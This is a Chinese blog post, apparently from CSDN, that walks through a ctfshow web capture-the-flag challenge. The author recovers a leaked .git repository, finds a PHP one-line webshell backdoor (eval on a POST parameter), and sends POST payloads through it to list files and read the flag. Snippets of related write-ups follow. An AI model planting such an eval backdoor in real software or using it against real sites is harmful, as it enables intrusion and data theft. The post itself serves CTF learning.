ctfshow 红包题第七弹

最新推荐文章于 2024-04-21 14:35:59 发布
最新推荐文章于 2024-04-21 14:35:59 发布
阅读量528 收藏
点赞数
分类专栏: ctfshow 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60378318/article/details/128826403
版权

Git_Extract进行扫描

python git_extract.py http://ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show/.git/

然后 [huc-serverlow@parrot]─[~/Git_Extract-master]
└──╼ $cd ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show

─[huc-serverlow@parrot]─[~/Git_Extract-master/ab303c77-a623-4ab8-ad76-2992c7d35c50.challenge.ctf.show]
└──╼ $cat backdoor.php
<!-- 36D姑娘留的后门,闲人免进 -->
<?php
        @eval($_POST['Letmein']);

 执行phpinfo();函数

 

查看当前文件夹

Letmein=print_r(glob('*'));

 

 得到flag

Letmein=highlight_file('/var/www/flag.txt');

 

 

小白猫咪
关注
专栏目录
ctfshow 红包第九 ssrf
m0_46412682的博客
07-14 1090
开始的页面 随便输入一个username,好像是报错 burpsuit抓包 在输入username和密码那里好像有ssrf,输入一个http://www.baid.com,看它有没有返回百度的页面,有则存在ssrf漏洞,经测试是有的 虽然目提示PS:由于出现权限问,取消了mysql密码,端口还 原为3306,但是还是要试下file读取本地文件,看下有没flag.txt 经测试是没有的,那就按目的提示,ssrf攻击mysql,这里用到gopher协议和gopherus工具。 gopherus工具http
ctfshow-红包第七
XYH_233的博客
03-15 470
CTFshow
CTFshow--web--红包第七
weixin_45908624的博客
01-29 464
ctfshow--web--红包第七
ctfshow-web-红包第七
HAI_WD的博客
08-27 304
发现一个.git文件403,这种情况通常都是存在文件夹,但是不能直接访问文件夹导致的。那么我们可以使用git_extract工具进行获取内容。蚁剑连接一下,发现无法下载文件,disable_functions会限制一些内容。那么直接使用蚁剑插件进行绕过即可。首先上来访问就是phpinfo。常规思路先扫一下目录。wx公众号,发送关键字 git 获取。git_extract工具可以搜索。发现一个backdoor.php文件。
ctfshow-web红包第七
最新发布
2202_75812594的博客
04-21 676
打开目首先就可以一个phpinfo(),找不到别的东西。1、目录扫描(不知道为什么我扫这一个就很慢,个/s,会疯)扫出来会发现很多,无疑就是存在。
ctfshow-红包第五
m0_67507776的博客
04-19 825
1.下载压缩包,正常解压得到“《画》.mp3”,各种针对音频没有作用,上当,结束...... 2.本zip里面隐藏了一个图片,需要用foremost分离出来 3.使用steghide得到隐写flag.txt文本文件,密码是猜的123456 steghide info .\xx.jpg #检测文件 steghide extract -sf .\xx.jpg #分离文件 4.得到flag.txt aHR0cHM6Ly93d3cubGFuem91cy...
ctfshow web 红包第二
08-16
- *3* [CTFSHOW 红包第二](https://blog.csdn.net/qq_46091464/article/details/107954930)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
CTFshow-web-红包第七
qq_68581192的博客
11-23 70
前面一步用git_extract工具扫描,可以查看backdoor.php源码(但是我搜了很久也还是下载不来,从github上下载了,就不会了),如果用了git_extract工具,就可以得到Letmein后门。在url后面添加/.git/index,发现下载了,打开发现里面有个backdoor.php。发现/var/www下存在flag.txt文件,但是蚁剑中无法查看,利用高亮函数传参查看内容。利用dirsearch工具扫描,发现了一个/.git/index。
CTF_ctfshow_red包7
weixin_54227009的博客
05-14 147
打开靶机,为phpinfo();没啥可利用的信息 利用GitHack.py扫描一下有没有源码泄露 扫到了: 主页源码: 后门代码: 蚁剑直接连:http://e6133b80-a41f-40d5-9e1a-fc65438baf02.challenge.ctf.show/backdoor.php 密码:Letmein 发现flag: 但打不开 没关系,利用浏览器的HackBar插件继续查看该后门是否可用 用post传参,参数为要执行的php函数 变量为一句话...
git-extract:从 Git 存储库中提取文件或文件夹
06-17
从 Git 存储库中提取文件或文件夹。 例子 $ extract server.js creaturephil/alpha $ ls server.js 安装 $ npm install -g git-extract 用法 Usage: extract [file | folder] [repositories] Commands: * extract files or folders from a Git repository Options: -h, --help output usage information -V, --version output the version number 执照
[CTFshow 红包挑战] 红包挑战7 Write up
Leaf_initial的博客
08-14 314
extract() 函数从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。第二个参数type用于指定当某个变量已经存在,而数组中又有同名元素时,extract() 函数如何对待这样的冲突。该函数返回成功导入到符号表中的变量数目。简单来说就是他可以接受我们的。
ctfshow 限时活动 红包挑战7和红包挑战8详细答案和见解
weixin_73562787的博客
08-14 259
这里的意思是extract()函数(传进来的必须是数组)来处理$_GET传入的参数,我起初一直在由于为什么,我传入的是value,name而不是value[],name[]为什么可以呢,是我太无知了。传入1=/usr/local/lib/php/extensions(是php扩展一个常见的默认安装目录)列出 /usr/local/lib/php/extensions/ 目录下的文件和子目录。函数这里思考了, 我们可以利用ini_set函数来暂时修改php.ini中的PHP配置 ,其中这里可以利用的方法是。
吾爱2023新年红包第六 (CTF)
热门推荐
Codeooo 博客
02-07 7万+
而且这里面还判断了key的长度,16位,正常key长度也是16位;上面这个 aWfkuqokj454836 15位,心态崩了,看来是假的,这个里面才是真的啊~~~~~~这几道,完全就是整人玩,一个一直点999次,一个大喊大叫还说你是细狗,还得声音分贝大于100才解锁开始找flag;直接将这个 |wfkuqokj4548366 key 扔进去 get_RealKey方法,在比较的时候打断点,或者hook,拿到正确的可以;看伪C代码,memcmp比较, 是有个和真key比较的地方,返回bool;
【CTFshow】 红包 ——持续更新中
algae
04-19 1369
红包 红包 葵花宝典 直接注册,登陆,拿到flag
CTFshow--web--红包第二
weixin_45908624的博客
01-29 1027
web--红包第二
CTF.show:新春红包wp
qq_46230755的博客
02-18 2866
这次ctfshow的新春赛,一共八,领到了六红包,第八是我出的,然后除了狸最后都有做出来。菜鸡一个罢了,简单写的wp师傅们蛮看看点点关注。然后感谢做过程中大师傅们的帮助,就不一一点名了,都是大师傅带的好我才做的出来的。 文章目录除夕:属于大牛的压缩包初一:爆竹声声初二:先天八卦操初三(情人节):阴阳人初四:长虫初五:新年好?初六:牛年大吉2.0初七:古代非对称密码 除夕:属于大牛的压缩包 目打开,修改文件名后缀为zip,打开后发现存在25个图片,复制25份,每份留下一份图片,对压缩包密码.
Hackgame ctf 助力大红包思路
tingfeng8的博客
10-28 551
接触ctf的第一周,在群里面看到中科大比赛(Hackergame 2021)刚入门别的都比较菜 先来看看web目,看到这个 FLAG 助力大红包,打开
【KaliLinux】————3、Git_Extract安装与使用
Fly_鹏程万里
08-17 4820
前言 .git泄露是一种常见的web安全漏洞,当一个网站存在git泄漏,攻击者可以通过git还原代码,从而获取网站源码等敏感文件。 .git泄露利用工具 项目地址:https://github.com/gakki429/Git_Extract 工具特点: 恢复项现包括: index 缓存 HEAD 现分支的恢复 logs/HEAD 日志 refs/stash 工作进度保...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值